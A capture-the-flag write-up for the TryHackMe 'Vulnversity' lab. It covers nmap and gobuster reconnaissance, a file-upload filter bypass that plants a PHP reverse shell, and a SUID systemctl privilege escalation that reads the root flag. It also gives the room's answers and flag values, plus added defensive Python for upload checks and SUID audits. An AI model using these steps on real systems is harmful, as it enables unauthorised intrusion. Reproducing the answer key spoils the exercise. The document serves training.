Vulnversity — Walkthrough Tryhackme
Vrijanandan Kumar
Cyber Security Enthusiast || CTF Player || Security Researchers || Passionate about Securing the Digital World || CEH
Introduction
"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.
Task 1: Deploy the Machine
Task 2: Reconnaissance
Use Nmap to scan the target machine. Run a basic scan with default scripts and version detection:
nmap -sC -sV 10.10.25.81
We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.
The scan also shows that the OS is Ubuntu and that the web server is running on port 3333.
Scan the box, how many ports are open?
Ans. 6
What version of the squid proxy is running on the machine?
Ans. 3.5.12
What is the most likely operating system this machine is running?
Ans. Ubuntu
What port is the web server running on?
Ans. 3333
It's essential to do your reconnaissance thoroughly before progressing. Knowing every open service (each of which can be a point of exploitation) is very important, and don't forget that ports in a higher range might be open, so always scan ports above 1000 as well (even if you leave that scan running in the background).
Ans. No answer needed
What is the flag for enabling verbose mode using Nmap?
Ans. -v
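Reading the scan results by hand works for one box, but Nmap's XML output (-oX) lets the same questions be answered from a script. The following is an added example, not part of the original walkthrough: SAMPLE_XML is a constructed stand-in shaped like the page's scan (ports 21, 22, 139, 445, 3128 and 3333 open, Squid 3.5.12 on 3128, Ubuntu visible in the banners), not real Nmap output, and the helper names are my own.

```python
"""Pull the room's answers out of Nmap XML output (nmap -sC -sV -oX scan.xml <target>).

Added example. SAMPLE_XML is a constructed sample shaped like the page's scan; it is
not real Nmap output and the non-Squid services carry no version on purpose.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sC -sV -oX scan.xml 10.10.25.81">
  <host>
    <address addr="10.10.25.81" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" extrainfo="Ubuntu Linux; protocol 2.0"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="3128"><state state="open"/><service name="http-proxy" product="Squid http proxy" version="3.5.12"/></port>
      <port protocol="tcp" portid="3333"><state state="open"/><service name="http" extrainfo="(Ubuntu)"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_ports(xml_text):
    """One dict per <port> element: number, protocol, state and service fields."""
    root = ET.fromstring(xml_text)
    entries = []
    for port in root.iter("port"):
        state = port.find("state")
        svc = port.find("service")
        get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
        entries.append({
            "port": int(port.get("portid")),
            "proto": port.get("protocol"),
            "state": state.get("state") if state is not None else "unknown",
            "service": get("name"),
            "product": get("product"),
            "version": get("version"),
            "extrainfo": get("extrainfo"),
        })
    return entries


def open_ports(entries):
    """Sorted list of port numbers reported as open (closed/filtered are dropped)."""
    return sorted(e["port"] for e in entries if e["state"] == "open")


def find_version(entries, keyword):
    """Version string of the first open service whose product or name mentions keyword."""
    kw = keyword.lower()
    for e in entries:
        if e["state"] == "open" and (kw in e["product"].lower() or kw in e["service"].lower()):
            return e["version"] or None
    return None


def os_hints(entries):
    """Distro names that Nmap tucks into service banners (extrainfo/product)."""
    hints = set()
    for e in entries:
        for token in ("Ubuntu", "Debian", "CentOS", "Windows"):
            if token in e["extrainfo"] or token in e["product"]:
                hints.add(token)
    return sorted(hints)


def web_ports(entries):
    """Open HTTP services, excluding proxies such as Squid."""
    return [e["port"] for e in entries
            if e["state"] == "open" and e["service"].startswith("http")
            and "proxy" not in e["service"]]


if __name__ == "__main__":
    entries = parse_ports(SAMPLE_XML)
    print("open ports:", open_ports(entries))
    print("squid version:", find_version(entries, "squid"))
    print("os hints:", os_hints(entries))
    print("web server ports:", web_ports(entries))
```

Run against a real -oX file by replacing SAMPLE_XML with the file's contents; the same functions then give the open-port count, the Squid version and the OS hint the room asks for.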
Task 3: Locating directories using Gobuster
Gobuster is a tool used in penetration testing to search for hidden directories and files on web servers. It can also brute-force URIs (directories and files), DNS subdomains and virtual host names.
Gobuster flags include dir (directory and file mode), -u (target URL) and -w (wordlist), as used in the command below.
To get started, you will need a wordlist for Gobuster (which it goes through quickly to identify whether a public directory exists). If you are using Kali Linux, you can find many wordlists under /usr/share/wordlists. You can also use the directory wordlist located at /usr/share/wordlists/dirbuster/directory-list-1.0.txt in the AttackBox.
gobuster dir -u https://10.10.25.81:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We discover an /internal directory, and further investigation reveals an /internal/uploads directory.
What is the directory that has an upload form page?
Ans. /internal/
Task 4: Compromise the webserver
We try to upload a PHP reverse shell script, but the extension is being filtered.
We start Burp Suite and enable it in FoxyProxy. Then we create a file listing different PHP extensions to use as the payload set for a Sniper attack.
We capture the upload request and send it to Intruder.
We load our payload as a simple list.
We launch the attack and review the results. Interestingly, every extension returns status 200, but the response length for the .phtml extension differs from the others.
I uploaded a reverse PHP shell from PentestMonkey and accessed it at "/internal/uploads/rev-shell.phtml". I also configured a Netcat listener on TCP port 1234. Then, I modified the file extension to ".phtml".
We start a Netcat listener:
nc -lvnp 1234
Then we upload the shell and navigate to https://10.10.25.81:3333/internal/uploads/php-reverse-shell.phtml, which executes the payload.
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Ans. .php
I understand the Burp Suite tool and its purpose during pentesting.
Ans. No answer needed
What extension is allowed after running the above exercise?
Ans. .phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
Ans. No answer needed
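The Intruder result above (.php rejected, .phtml accepted) is the signature of a deny-list filter: it blocks the one extension the developer thought of and passes every variant. The following is an added example, not the room's PHP upload handler: it models a deny-list check and an allow-list check in Python, runs a candidate list through each the way the sweep did, and shows a server-chosen storage name. The extension sets, candidate list and function names are illustrative assumptions, not taken from the target.

```python
"""Deny-list versus allow-list extension checks for an upload form.

Added example modelling the filtering logic; not the room's PHP code. The extension
sets and CANDIDATES are constructed for illustration.
"""
import os
import secrets


def split_ext(filename):
    """Last extension of the basename, lower-cased; the root keeps any earlier dots."""
    root, ext = os.path.splitext(os.path.basename(filename))
    return root, ext.lower()


# Weak pattern: block the one extension the developer thought of.
PHP_DENYLIST = {".php"}


def denylist_accepts(filename):
    return split_ext(filename)[1] not in PHP_DENYLIST


# Stronger pattern: accept only what the feature needs, and nothing with a second extension.
IMAGE_ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}


def allowlist_accepts(filename):
    root, ext = split_ext(filename)
    if ext not in IMAGE_ALLOWLIST:
        return False
    if not root or "." in root:  # refuse shell.phtml.jpg-style double extensions
        return False
    return True


def stored_name(filename):
    """Server-chosen storage name: random token plus the validated extension, so the
    uploader controls neither the name nor the extension that ends up on disk."""
    if not allowlist_accepts(filename):
        raise ValueError("upload rejected: %r" % filename)
    return secrets.token_hex(8) + split_ext(filename)[1]


def sweep(accepts, extensions, stem="shell"):
    """Mirror the Intruder sweep: which candidate extensions does this filter let through?"""
    return [ext for ext in extensions if accepts(stem + ext)]


# Constructed candidate list, in the spirit of the Intruder payload list on the page.
CANDIDATES = [".php", ".phtml", ".php5", ".phar", ".jpg", ".phtml.jpg"]

if __name__ == "__main__":
    print("deny-list lets through:", sweep(denylist_accepts, CANDIDATES))
    print("allow-list lets through:", sweep(allowlist_accepts, CANDIDATES))
```

The deny-list passes everything except .php, including the .phtml the room relies on; the allow-list passes only .jpg. An extension check is one layer: the upload directory should additionally be served without a PHP handler (or sit outside the document root), and the file content should be validated, not just its name.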
What is the name of the user who manages the webserver?
Ans. bill
cd /home
ls
bash -i
cd bill
ls
cat user.txt
What is the user flag?
Ans. 8bd7992fbe8a6ad22a63361004cfcedb
Task 5: Privilege Escalation
With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:
find / -perm -u=s -type f 2>/dev/null
We notice that /bin/systemctl is a SUID binary, which we can leverage to obtain elevated privileges. Let's refer to GTFOBins and search for systemctl.
Reference: https://gtfobins.github.io/gtfobins/systemctl/
We create a temporary service and use it to read the root.txt file:
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
cd /tmp
cat output
On the system, search for all SUID files. Which file stands out?
Ans. /bin/systemctl
What is the root flag value?
Ans. a58ff8579f0a9270368d33a9966c7fd5
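The find command above answers "which SUID file stands out?" by eye; a defender wants the same walk done repeatably and compared against a known-good baseline, so that a set-uid /bin/systemctl is flagged automatically. The following is an added example, not part of the original walkthrough: find_suid mirrors find / -perm -u=s -type f 2>/dev/null, EXPECTED_SUID is an illustrative baseline (assumption: a real one is generated from a known-good image of the same distribution), and demo builds a throwaway tree in a temp directory rather than scanning the host.

```python
"""Find set-uid files the way `find / -perm -u=s -type f 2>/dev/null` does, then flag
the ones missing from a known-good baseline.

Added example, not part of the original walkthrough. EXPECTED_SUID is illustrative;
demo() scans a constructed temp tree, not the real filesystem.
"""
import os
import stat
import tempfile


def find_suid(root):
    """Regular files under root with the set-uid bit; unreadable paths are skipped,
    matching the 2>/dev/null in the find command."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


# Illustrative baseline of binaries that are set-uid on a stock Ubuntu install
# (assumption: generate the real list from a known-good image, do not hand-type it).
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def unexpected_suid(found, expected=EXPECTED_SUID):
    """Set-uid paths that are not in the baseline; /bin/systemctl would land here."""
    return sorted(p for p in found if p not in expected)


def demo():
    """Constructed tree: two files, one of them set-uid. Returns hits relative to the tree."""
    with tempfile.TemporaryDirectory() as top:
        bindir = os.path.join(top, "bin")
        os.makedirs(bindir)
        for name in ("ls", "systemctl"):
            path = os.path.join(bindir, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, 0o755)
        os.chmod(os.path.join(bindir, "systemctl"), 0o4755)  # the stand-out bit
        return [os.path.relpath(p, top) for p in find_suid(top)]


if __name__ == "__main__":
    print("set-uid in demo tree:", demo())
    print("unexpected on a host would be:",
          unexpected_suid(["/bin/systemctl", "/usr/bin/sudo"]))
```

Pointing find_suid at "/" reproduces the page's listing; anything unexpected_suid returns deserves a look, and a set-uid bit on a binary that does not need it (systemctl here) is removed with chmod u-s.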
Thank you very much for reading. I hope this is helpful to you. If you have any suggestions or something to add, feel free to contact me anytime.
Happy Hacking!